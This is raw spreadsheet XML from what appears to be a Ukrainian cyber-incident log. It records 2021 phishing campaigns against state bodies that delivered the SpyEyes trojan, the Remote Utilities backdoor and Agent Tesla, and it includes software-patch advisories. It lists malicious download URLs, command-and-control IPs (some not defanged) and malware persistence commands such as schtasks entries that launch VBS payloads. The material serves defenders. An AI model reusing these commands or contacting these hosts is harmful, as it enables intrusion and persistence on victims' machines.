Наприклад, сьогодні відбулась масова розсилка фішингових листів з темою «Виплати ветеранам АТО», які відправлялись з різних gmail адрес. Листи містили в собі начебто посилання на сайт mil.gov.ua, але насправді це різні скорочені посилання, які ведуть на сайт hXXp://gosloto[.]site/doc221/form_request.doc для завантаження Microsoft Word файлу «form_request.doc» (містить шкідливий код, що використовує вразливість CVE-2017-11882 ). Цей файл після відкриття завантажує index333.txt за посиланням hХХp://name1d[.]site/index333.txt, який  є виконуваним .ЕХЕ файлом  - трояном SpyEyes. Відповідне ШПЗ встановлює з’єднання з С2 сервером 31.42.185[.]63, збирає інформацію про комп’ютер жертви, передає та завантажує файли.</t>
  </si>
  <si>
    <t>НАТО; ua</t>
  </si>
  <si>
    <t>pdf, zip, doc, txt, bat, exe,rtf</t>
  </si>
  <si>
    <t>195.128.123[.]215 
185.232.170[.]29 
51.254.63[.]225 
hxxp://2055[.]site/doc/NATO_AC-A(2021).zip
hxxp://1924[.]site/doc/NATO_Direct.zip
hxxp://name1d[.]site/index.txt
hxxp://name1d[.]site/def.bat
hxxp://name1d[.]site/file.exe
hxxp://smm2021[.]net/wp-adm/gate.php
hxxp://1017[.]site/index-ff.php</t>
  </si>
  <si>
    <t>ping localhost -n 3
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 5 /tn "Maintenance" /tr "C:\Users\%%USERNAME%%\AppData\Local\z_%USERNAME%\%USERNAME%.vbs" /F</t>
  </si>
  <si>
    <t>07.04.2021 відбулась масова розсилка по державним органам України фішингових листів зі вкладеним шкідливим програмним забезпеченням. Тема листів відрізняється, проте основною тематикою є НАТО.
Відповідні листи можуть містити у собі посилання на фішнгові ресурси, прикріплені файли формату pdf, doc, rtf чи  zip архіви з паролем або без.
Наприклад, pdf файли містять посилання на сервіс скорочених адрес з переадресацією на командно-контрольні сервери, з яких завантажується zip архів чи doc, rtf файл.
doc, rtf файли містять шкідливе навантаження, що використовує вразливість CVE-2017-11882. У разі відкриття документу, вбудований шеллкод завантажує та ініціює запуск файлу index.txt, який являє собою троян SpyEyes. Відповідне ШПЗ встановлює з’єднання з С2 серверами, передає та завантажує файли.</t>
  </si>
  <si>
    <t>CVE-2017-11883</t>
  </si>
  <si>
    <t>CWE-120</t>
  </si>
  <si>
    <t>Cisco Jabber users</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</si>
  <si>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</si>
  <si>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CVE-2021-1411</t>
  </si>
  <si>
    <t>CWE-170</t>
  </si>
  <si>
    <t>Denial of Service, Stolen personal data</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</si>
  <si>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</si>
  <si>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CVE-2021-1417</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</si>
  <si>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</si>
  <si>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CVE-2021-1418</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</si>
  <si>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</si>
  <si>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CVE-2021-1469</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">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t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://tools.cisco.com/.../cisco-sa-cisco-jabber...</t>
    </r>
  </si>
  <si>
    <t>CVE-2021-1471</t>
  </si>
  <si>
    <t>Remote Utilities, UPX</t>
  </si>
  <si>
    <t>145.239.23.207
194.156.99.64
178.210.76.171
195.24.68.15
hXXps://www.remoteutilities[.]com
hXXps://rmansys[.]ru</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">22.03.2021 відбулась масова розсилка по державним органам України фішингових листів зі вкладеним шкідливим програмним забезпеченням начебто від Суворовського районного суду м. Одеси. Тема листа «Судовий запит № 765251150».
Вкладення містило в собі ZIP архів «Електронний судовий запит.zip», який містив в собі RAR-архів «Електронний судовий запит № 0990092883737373.rar», який містив .EXE файл «Електронний судовий запит № 0990092883737373.docx.exe». 
Під час запуску .exe файлу відбувається інсталяція програмного забезпечення Remote Utilities (hXXps://www.remoteutilities[.]com або hXXps://rmansys[.]ru). 
Зазначена кібератака та інструменти, які в ній використовуються, подібні до кібератаки, яка відбулась 19.01.2021 та 09.03.2021 і описана на сайті CERT-UA:
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://cert.gov.ua/article/10011</t>
    </r>
  </si>
  <si>
    <t>194.156.99[.]64
195.24.68[.]15
hXXps://www.remoteutilities[.]com
hXXps://rmansys[.]ru</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">09.03.2021 відбулась масова розсилка по державним органам України фішингових листів зі вкладеним шкідливим програмним забезпеченням начебто від Державної судової адміністрації України. Тема листа «Судовий запит № 99182794».
Вкладення містило в собі ZIP архів «Електронний запит документів.zip», який містив в собі RAR-архів «Електронний запит документів.rar», який містив .EXE файл «Електронний запит документів.exe». 
Під час запуску .exe файлу відбувається інсталяція програмного забезпечення Remote Utilities (hXXps://www.remoteutilities[.]com або hXXps://rmansys[.]ru). 
Зазначена кібератака та інструменти, які в ній використовуються, подібні до кібератаки, яка відбулась 19.01.2021 і описана на сайті CERT-UA:
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://cert.gov.ua/article/10011</t>
    </r>
  </si>
  <si>
    <t>Київ, Прокуратура; ua</t>
  </si>
  <si>
    <t>139.28.38[.]254
hXXps://www.remoteutilities[.]com
hXXps://rmansys[.]ru
administracija@gargzduspc.lt</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">03.03.2021 відбулась масова розсилка по державним органам України фішингових листів зі вкладеним шкідливим програмним забезпеченням начебто від Київської міської прокуратури. Листи відправлялись з пошти administracija@gargzduspc.lt . Тема листа «Київська міська прокуратура».
Вкладення містило в собі ZIP архів «Електронний запит документів.zip», який містив в собі RAR-архів  «Електронний запит документів.rar», який містив .EXE файл «Електронний запит документів.exe». 
Під час запуску .exe файлу відбувається інсталяція програмного забезпечення Remote Utilities (hXXps://www.remoteutilities[.]com або hXXps://rmansys[.]ru). Зазначене програмне забезпечення це легітимне програмне забезпечення для віддаленого доступу, тому його запуск може не виявлятись антивірусами.
В даний час на VirusTotal його виявляють всього 3 антивіруси. https://www.virustotal.com/.../7a986db7a9d76e88.../detection.
Зазначена кібератака та інструменти, які в ній використовуються подібні до кібератаки, яка відбулась 19.01.2021 і описана на сайті CERT-UA
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://cert.gov.ua/article/10011.</t>
    </r>
  </si>
  <si>
    <t>rar, exe</t>
  </si>
  <si>
    <t>82.207.97[.]236
wsus2.co 
111.90.157[.]39
23.235.252[.]66
knpz_mail@kms.rosneft.ru</t>
  </si>
  <si>
    <t>04.02.2021 відбулась масова розсилка по державним установам України фішингових електронних листів. Листи відправлялись з ІР адреси 82.207.97[.]236 із зазначенням відправника knpz_mail@kms.rosneft[.]ru, 
Тема листа: «Исх: 02480048398».
Фішингові листи містять прикріплений файл з архівом, в якому знаходиться шкідливе програмне забезпечення для віддаленого доступу до комп’ютерів жертв.</t>
  </si>
  <si>
    <t xml:space="preserve">Remote Utilities </t>
  </si>
  <si>
    <t>rar, bat, exe, msi</t>
  </si>
  <si>
    <t>zapros@dsszzi.gov.ua
212.44.151.60
185.161.208.186</t>
  </si>
  <si>
    <t>C:\Program Files (x86)\Remote Utilities - Host\rutserv.exe' /silentinstall
'C:\Program Files (x86)\Remote Utilities - Host\rutserv.exe' /firewall
'C:\Program Files (x86)\Remote Utilities - Host\rutserv.exe' /start
C:\Program Files (x86)\Remote Utilities - Host\rutserv.exe
C:\Program Files (x86)\Remote Utilities - Host\rfusclient.exe
'C:\Program Files (x86)\Remote Utilities - Host\rfusclient.exe' /tray
\Program Files (x86)\Remote Utilities - Host
%TEMP%\7ZipSfx.000\
\Windows\Installer\MSI33C6.tmp
\Windows\Installer\fa1d2b5a.msi</t>
  </si>
  <si>
    <t>Вночі 19.01.2021 було здійснено масову розсилку по державним установам України фішингових електронних листів начебто від Адміністрації Держспецзв’язку. Листи відправлялись з поштової скриньки zapros@dsszzi.gov.ua. Такої поштової скриньки та підрозділу «департамент перевірок» в Держспецзв’язку не існує, ім’я відправника було підмінено. 
Тема листа: «Від: АДМІНІСТРАЦІЯ ДЕРЖСПЕЦЗВ’ЯЗКУ».
Всі листи відправлялися з ІР-адреси 212.44.151[.]60, яка знаходиться в Російській Федерації.
Фішингові листи містять прикріплений файл з архівом, в якому знаходиться програмне забезпечення для віддаленого доступу до комп’ютерів жертв.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/10011</t>
  </si>
  <si>
    <t>http://tridiuma.ru/scaffold.php
tridiuma.ru
http://barbatus.online/get.php
http://188.225.37.128/index.php</t>
  </si>
  <si>
    <t>%PUBLIC% \Documents\
%APPDATA%\Microsoft\
schtasks /Create /SC MINUTE /MO 15 /F /tn PublicFolderDownload /tr \Documents\inspection.exe //b \Documents\inspection.vbs, 0, False.
schtasks /Create /SC MINUTE /MO 13 /F /tn HelpOffice /tr "%APPDATA%\Microsoft\say\say.exe //b %APPDATA%\Microsoft\say\say.vbs"
C:\Windows\SysWOW64\PING.EXE ping tridiuma.ru
SCHTASKS /CREATE /sc minute /mo 5 /tn "" /tr "%USERPROFILE%\UserSupport\UserSupport.exe" /F</t>
  </si>
  <si>
    <t>03.03.2021 відбулась масова розсилка по державним органам України фішингових листів зі вкладеним шкідливим програмним забезпеченням начебто від Київської міської прокуратури. Листи відправлялись з пошти administracija@gargzduspc.lt . Тема листа «Київська міська прокуратура».
Вкладення містило в собі ZIP архів «Електронний запит документів.zip», який містив в собі RAR-архів  «Електронний запит документів.rar», який містив .EXE файл «Електронний запит документів.exe». 
Під час запуску .exe файлу відбувається інсталяція програмного забезпечення Remote Utilities (hXXps://www.remoteutilities[.]com або hXXps://rmansys[.]ru). Зазначене програмне забезпечення це легітимне програмне забезпечення для віддаленого доступу, тому його запуск може не виявлятись антивірусами.
В даний час на VirusTotal його виявляють всього 3 антивіруси. https://www.virustotal.com/.../7a986db7a9d76e88.../detection.
Зазначена кібератака та інструменти, які в ній використовуються подібні до кібератаки, яка відбулась 19.01.2021 і описана на сайті CERT-UA
https://cert.gov.ua/article/10011.</t>
  </si>
  <si>
    <t>09.03.2021 відбулась масова розсилка по державним органам України фішингових листів зі вкладеним шкідливим програмним забезпеченням начебто від Державної судової адміністрації України. Тема листа «Судовий запит № 99182794».
Вкладення містило в собі ZIP архів «Електронний запит документів.zip», який містив в собі RAR-архів «Електронний запит документів.rar», який містив .EXE файл «Електронний запит документів.exe». 
Під час запуску .exe файлу відбувається інсталяція програмного забезпечення Remote Utilities (hXXps://www.remoteutilities[.]com або hXXps://rmansys[.]ru). 
Зазначена кібератака та інструменти, які в ній використовуються, подібні до кібератаки, яка відбулась 19.01.2021 і описана на сайті CERT-UA:
https://cert.gov.ua/article/10011</t>
  </si>
  <si>
    <t>22.03.2021 відбулась масова розсилка по державним органам України фішингових листів зі вкладеним шкідливим програмним забезпеченням начебто від Суворовського районного суду м. Одеси. Тема листа «Судовий запит № 765251150».
Вкладення містило в собі ZIP архів «Електронний судовий запит.zip», який містив в собі RAR-архів «Електронний судовий запит № 0990092883737373.rar», який містив .EXE файл «Електронний судовий запит № 0990092883737373.docx.exe». 
Під час запуску .exe файлу відбувається інсталяція програмного забезпечення Remote Utilities (hXXps://www.remoteutilities[.]com або hXXps://rmansys[.]ru). 
Зазначена кібератака та інструменти, які в ній використовуються, подібні до кібератаки, яка відбулась 19.01.2021 та 09.03.2021 і описана на сайті CERT-UA:
https://cert.gov.ua/article/10011</t>
  </si>
  <si>
    <t>Вразливості Cisco Jabber .
Компанія Cisco 25.03.2021 опублікувала інформацію про вразливості в Cisco Jabber для Windows, Cisco Jabber для MacOS, а також Cisco Jabber для мобільних платформ, які можуть дозволити зловмиснику виконувати довільні програми з основної операційної системи з підвищеними привілеями, отримувати доступ до конфіденційної інформації, перехоплювати захищений мережевий трафік або спричиняти відмову в обслуговуванні (DOS) кінцевого пристрою.
Вразливості (CVE-2021-1411, CVE-2021-1417, CVE-2021-1418, CVE-2021-1469, CVE-2021-1471) не залежать одна від одної.
Якщо ви використовуєте Cisco Jabber у своїй роботі радимо негайно здійснити оновлення зазначеного програмного забезпечення до актуальної версії.
Для отримання більш детальної інформації про вразливості перейдіть за посиланням:
https://tools.cisco.com/.../cisco-sa-cisco-jabber...</t>
  </si>
  <si>
    <t>hXXp://31.42.185[.]63:8080/upld/D6BDA66A
hXXp://name1d[.]site/index333.txt
hXXp://gosloto[.]site/doc221/form_request.doc
195.128.123[.]215 
185.232.170[.]29 
51.254.63[.]225
31.42.185[.]63
mil.gov.ua</t>
  </si>
  <si>
    <t>Відновилися масові розсилки на електронні поштові адреси державних органів України фішингових листів зі вкладеним бекдором Remote Utilities або посиланнями на його завантаження. 
Листи направляються з різних поштових адрес, використовуючи спуфінг. Містять запит  начебто від Національної Поліції України  щодо надання відомостей та спонукають відкрити додаток, який прикріплено до листа.
Архів містить програмне забезпечення Remote Utilities (hXXps://www.remoteutilities[.]com або hXXps://rmansys[.]ru). 
Зазначена кібератака та інструменти, які в ній використовуються, подібні до кібератак, які відбувались 13.03.2021, 09.03.2021, 23.03.2021, 19.01.2021 і описані на сайті CERT-UA:
https://cert.gov.ua/article/10011</t>
  </si>
  <si>
    <t>Продовжуються масові розсилки на електронні поштові адреси державних органів України фішингових листів зі вкладеним шкідливим програмним забезпеченням або посиланнями на його завантаження.
Листи містять інформацію начебто від Нової пошти, щодо відправлення вантажу та спонукають перейти за посиланням для перегляду деталей відправлення.
За посиланням знаходиться архів, що містить шкідливе програмне забезпечення Agent Tesla.
Ознайомитись з описом відповідного сімейства ШПЗ можливо за посиланням: https://cert.gov.ua/article/3028</t>
  </si>
  <si>
    <t>Корпорація Майкрософт випустила оновлення безпеки для усунення вразливості віддаленого виконання коду (RCE) - відомої як PrintNightmare (CVE-2021-34527) - у службі Windows Print spooler.
Оновлення містять усі попередні виправлення, а також захист для CVE-2021-1675. Оновлення не включають Windows 10 версії 1607, Windows Server 2012 або Windows Server 2016 - Microsoft заявляють, що оновлення цих версій очікуються. 
Відповідно до CERT/CC, оновлення Microsoft для CVE-2021-34527, стосується лише способів віддаленого виконання коду (RCE через SMB та RPC) PrintNightmare, а не способу Local Privilege Escalation (LPE)». Перегляньте примітку про вразливість CERT/CC # 383432 щодо оновлення для LPE.
Рекомендуємо користувачам та адміністраторам переглянути оновлення безпеки Microsoft, а також примітку про вразливість CERT/CC та застосувати необхідні оновлення:
https://msrc.microsoft.com/.../vulnerability/CVE-2021-34527
https://www.kb.cert.org/vuls/id/383432</t>
  </si>
  <si>
    <t>Нагадуємо про необхідність своєчасного оновлення програмного забезпечення.
Microsoft випустили оновлення безпеки для усунення вразливостей в своєму програмному забезпеченні. Рекомендуємо переглянути та встановити необхідні оновлення:
https://msrc.microsoft.com/update-guide/releaseNote/2021-Nov 
https://msrc.microsoft.com/update-guide/deployments 
VMware випустили рекомендації щодо безпеки для усунення вразливості підвищення привілеїв у vCenter Server та Cloud Foundation. Ознайомитись можна за посиланням:
https://www.vmware.com/sec.../advisories/VMSA-2021-0025.html
Версія Google Chrome 96 (96.0.4664.36) для iOS буде доступна в App Store через кілька днів. Ознайомитись можна за посиланням:
https://chromereleases.googleblog.com/.../chrome-for-ios...
SAP випустили оновлення безпеки для усунення вразливостей у кількох продуктах. Рекомендуємо переглянути та встановити необхідні оновлення:
https://wiki.scn.sap.com/wiki/pages/viewpage.action...
Adobe випустили оновлення безпеки для усунення вразливостей у кількох продуктах. Рекомендуємо переглянути та встановити необхідні оновлення:
RoboHelp:
https://helpx.adobe.com/.../robohelp-server/apsb21-87.html 
InCopy:
https://helpx.adobe.com/.../products/incopy/apsb21-110.html 
Creative Cloud Desktop Application:
https://helpx.adobe.com/.../creative-cloud/apsb21-111.html 
CISA опублікувала рекомендації щодо промислових систем управління (ICS), де детально описано численні вразливості, виявлені в операційних системах реального часу Siemens Nucleus (RTOS) і допоміжних бібліотеках. Ознайомитись можна за посиланням:
https://us-cert.cisa.gov/ics/advisories/icsa-21-313-03 
Citrix випустили оновлення безпеки для усунення вразливостей у кількох версіях Citrix Application Delivery Controller (ADC), Gateway та SD-WAN WANOP. Рекомендуємо переглянути та встановити необхідні оновлення:
https://support.citrix.com/article/CTX330728 
Samba випустили оновлення безпеки для усунення вразливостей у кількох версіях Samba. Рекомендуємо переглянути та встановити необхідні оновлення:
CVE-2016-2124:
https://www.samba.org/samba/security/CVE-2016-2124.html 
CVE-2020-25717:
https://www.samba.org/samba/security/CVE-2020-25717.html 
CVE-2020-25718:
https://www.samba.org/samba/security/CVE-2020-25718.html 
CVE-2020-25719:
https://www.samba.org/samba/security/CVE-2020-25719.html 
CVE-2020-25721:
https://www.samba.org/samba/security/CVE-2020-25721.html 
CVE-2020-25722:
https://www.samba.org/samba/security/CVE-2020-25722.html 
CVE-2021-3738:
https://www.samba.org/samba/security/CVE-2021-3738.html 
CVE-2021-23192:
https://www.samba.org/samba/security/CVE-2021-23192.html 
Palo Alto Networks (PAN) надали рекомендації для усунення вразливості CVE-2021-3064 Protect VPN версії PAN-OS. Ознайомитись з рекомендаціями можна посиланням:
https://security.paloaltonetworks.com/CVE-2021-3064...</t>
  </si>
  <si>
    <t>Звертаємо Вашу увагу на вразливість (CVE-2021-41379), що присутня на всіх версіях Microsoft Windows, яка дозволяє зловмиснику підвищити права доступу. Код експлойту даної вразливості є у відкритому доступі під назвою InstallerFileTakeOver. Вже помічені зразки шкідливого програмного забезпечення, які використовують цю вразливість. В Microsoft, поки що відсутнє оновлення безпеки, яке усуває цю вразливість.
Для захисту та виявлення спроб експлуатації зазначеної вразливості радимо скористатися правилами SNORT, запропонованими Talos: https://snort.org/advisories/talos-rules-2021-11-23.
Також, радимо включити автоматичні оновлення Windows та оновити свої ОС одразу, коли випустять оновлення безпеки, яке усуває зазначену вразливість. 
Інформація щодо вразливості на офіційному сайті Microsoft: https://msrc.microsoft.com/.../vulnerability/CVE-2021-41379
ID події в MISP CERT-UA:
https://misp.cert.gov.ua/events/view/1613</t>
  </si>
  <si>
    <t>Новини та рекомендації кібербезпеки.
CISA опублікувала рекомендації щодо Автоматизованих систем керування (ICSA), пов’язаних з публічним звітом, де детально описані вразливості, виявлені в кількох реалізаціях служби розповсюдження даних (DDS) групи управління об'єктами (OMG) з відкритим вихідним кодом та власністю. Рекомендуємо переглянути та встановити необхідні оновлення:
https://us-cert.cisa.gov/ics/advisories/icsa-21-315-02 
CISA і Федеральне бюро розслідувань (ФБР) опублікували спільну рекомендацію з кібербезпеки, яка ідентифікує активне використання вразливості — CVE-2021-44077 — у Zoho ManageEngine ServiceDesk Plus. Ознайомитись можна за посиланням:
https://us-cert.cisa.gov/ncas/alerts/aa21-336a
Також нагадуємо про необхідність своєчасного оновлення програмного забезпечення.
VMware випустила оновлення безпеки для усунення численних вразливостей у vCenter Server і Cloud Foundation. Рекомендуємо переглянути та встановити необхідні оновлення:
https://www.vmware.com/sec.../advisories/VMSA-2021-0027.html
Palo Alto Networks випустили оновлення безпеки для усунення вразливостей, що вражають конфігурації брандмауера PAN-OS з інтерфейсами порталу та шлюзу GlobalProtect (8.1.16 та старіших версій). Рекомендуємо переглянути та встановити необхідні оновлення:
https://security.paloaltonetworks.com/CVE-2021-3064 
Компанія Google випустила оновлення Chrome 96 для iOS та Android. Ознайомитись можна за посиланнями:
- Chrome 96 (96.0.4664.45) для Android:
https://chromereleases.googleblog.com/.../chrome-for... 
- Chrome 96 (96.0.4664.53) для iOS:
https://chromereleases.googleblog.com/.../chrome-for-ios... 
Mozilla випустила оновлення безпеки для усунення вразливості в службах безпеки мережі (NSS). Рекомендуємо переглянути та встановити необхідні оновлення:
https://www.mozilla.org/.../security/advisories/mfsa2021-51/ 
Drupal випустив оновлення безпеки для усунення вразливостей, які можуть вплинути на версії 8.9, 9.1 і 9.2. Рекомендуємо переглянути та встановити необхідні оновлення:
https://www.drupal.org/sa-core-2021-011</t>
  </si>
  <si>
    <t>Критична вразливість Log4Shell (RCE).
Вразливість Java бібліотеки log4j CVE-2021-44228 дозволяє зловмисникам здійснити віддалене виконання коду та повністю скомпрометувати вразливу машину. 
В мережі вже опубліковано експлойт вразливості, і наразі зловмисники активно шукають в мережі вразливі хости з метою подальшої їх компрометації. Зараз вразливість експлуатується з метою завантаження на вразливі сервери криптомайнерів. 
Вразливість виправлено у версії 2.15.0.
Рекомендуємо негайно оновити log4j до останньої версії.
Останню версію Log4J можна знайти за посиланням: 
https://logging.apache.org/log4j/2.x/download.html</t>
  </si>
  <si>
    <t>Нагадуємо про необхідність своєчасного оновлення програмного забезпечення.
OpenSSL випустив оновлення безпеки, які усувають уразливість, яка впливає на кілька версій OpenSSL. Рекомендуємо переглянути та встановити необхідні оновлення:
https://www.openssl.org/news/secadv/20220315.txt 
Cisco випустила оновлення безпеки для усунення вразливостей у багатьох продуктах. Рекомендуємо переглянути та встановити необхідні оновлення:
- Cisco Expressway Series and Cisco TelePresence Video Communication Server Vulnerabilities 
https://tools.cisco.com/.../cisco-sa-expressway-filewrite... 
- Cisco Ultra Cloud Core - Subscriber Microservices Infrastructure Privilege Escalation Vulnerability  
https://tools.cisco.com/.../cisco-sa-uccsmi-prvesc-BQHGe4cm 
- Cisco Identity Services Engine RADIUS Service Denial of Service Vulnerability
https://tools.cisco.com/.../Cis.../cisco-sa-ise-dos-JLh9TxBp 
Щоб дізнатися про оновлення, що стосуються вразливостей меншої серйозності, див https://tools.cisco.com/security/center/publicationListing.x 
Корпорація Майкрософт випустила оновлення для усунення численних вразливостей програмного забезпечення Microsoft. Рекомендуємо переглянути та встановити необхідні оновлення:
https://msrc.microsoft.com/update-guide/en-us
https://msrc.microsoft.com/update-guide/deployments%C2%A0 
Apple випустила оновлення безпеки для усунення вразливостей у багатьох продуктах. Рекомендуємо переглянути та встановити необхідні оновлення:
https://support.apple.com/en-us/HT201222 
WordPress випустили оновлення до версії 5.9.2. Рекомендуємо переглянути та встановити необхідні оновлення:
https://wordpress.org/.../wordpress-5-9-2-security.../
Google випустив Chrome версію 99.0.4844.74 для Windows, Mac і Linux, Chrome 99 (99.0.4844.73) для Android, Chrome 99 (99.0.4844.59) для iOS. Рекомендуємо переглянути та встановити необхідні оновлення:
- Chrome 99:
https://chromereleases.googleblog.com/.../stable-channel... 
- Chrome 99 для Android:
https://chromereleases.googleblog.com/.../chrome-for... 
- Chrome 99 для iOS:
https://chromereleases.googleblog.com/.../chrome-for-ios... 
Adobe випустила оновлення безпеки для усунення вразливостей у багатьох продуктах. Рекомендуємо переглянути та встановити необхідні оновлення:
- Photoshop 
https://helpx.adobe.com/.../prod.../photoshop/apsb22-14.html
- Illustrator 
https://helpx.adobe.com/.../illustrator/apsb22-15.html
- After Effects 
https://helpx.adobe.com/.../after_effects/apsb22-17.html
Консорціум Інтернет-систем (ISC) опублікував рекомендації щодо безпеки, які усувають уразливості, що впливають на декілька версій домену ISC Berkeley Internet Name Domain (BIND). Ознайомитись детальніше можна за посиланнями:
- CVE-2021-25220
- CVE-2022-0396
- CVE-2022-0635
- CVE-2022-0667
Drupal випустив оновлення безпеки для усунення вразливостей, що впливають на Drupal 9.2 та 9.3. Рекомендуємо переглянути та встановити необхідні оновлення:
https://www.drupal.org/sa-core-2022-005 
SAP випустила оновлення безпеки для усунення вразливостей, що впливають на декілька продуктів. Рекомендуємо переглянути та встановити необхідні оновлення:
https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G... 
CISA випустила консультацію щодо промислових систем контролю (ICSA), де детально описано вразливості в агенті PTC Axeda та сервері Axeda Desktop. Ознайомитись можна за посиланнями:
https://www.cisa.gov/uscert/ics/advisories/icsa-22-067-01
https://www.fda.gov/.../digital-health.../cybersecurity 
Mozilla випустила оновлення безпеки для усунення вразливостей у багатьох продуктах. Рекомендуємо переглянути та встановити необхідні оновлення:
https://www.mozilla.org/.../security/advisories/mfsa2022-09/</t>
  </si>
  <si>
    <t>UPD!
Звертаємо Вашу увагу на нові вразливісті Spring Framework: Spring4Shell (CVE-2022-22965), CVE-2022-22950 та CVE-2022-22963.
CVE-2022-22965 (Spring4Shell)
Spring4Shell на даний момент не має CVE ID. Дана вразливість існує в Spring core з JDK від версії 9.0 включною.
Більше деталей про вразливість та рекомендації за посиланням:
https://tanzu.vmware.com/security/cve-2022-22965
CVE-2022-22950
У версіях Spring Framework 5.3.0 - 5.3.16 і старіших непідтримуваних версіях користувач може надати спеціально створений вираз SpEL, який може спричинити відмову в обслуговуванні.
Більше деталей про вразливість та рекомендації за посиланням:
https://tanzu.vmware.com/security/cve-2022-22950
CVE-2022-22963
Вразливість знайдено у версіях Spring Cloud Function 3.0.0.RELEASE - 3.2.2.
Дана вразливість дозволяє зловмиснику за допомогою введення виразу SPEL віддалене виконання довільного коду.
Більше деталей про вразливість та рекомендації за посиланням:
https://tanzu.vmware.com/security/cve-2022-22963</t>
  </si>
  <si>
    <t>https://loda.gov.ua//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</si>
</sst>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d.mm.yyyy"/>
  </numFmts>
  <fonts count="10">
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Inconsolata"/>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Alignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="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49" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="164" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="49" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="164" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="165" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="4" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="4" numFmtId="4" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf quotePrefix="1" borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="164" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
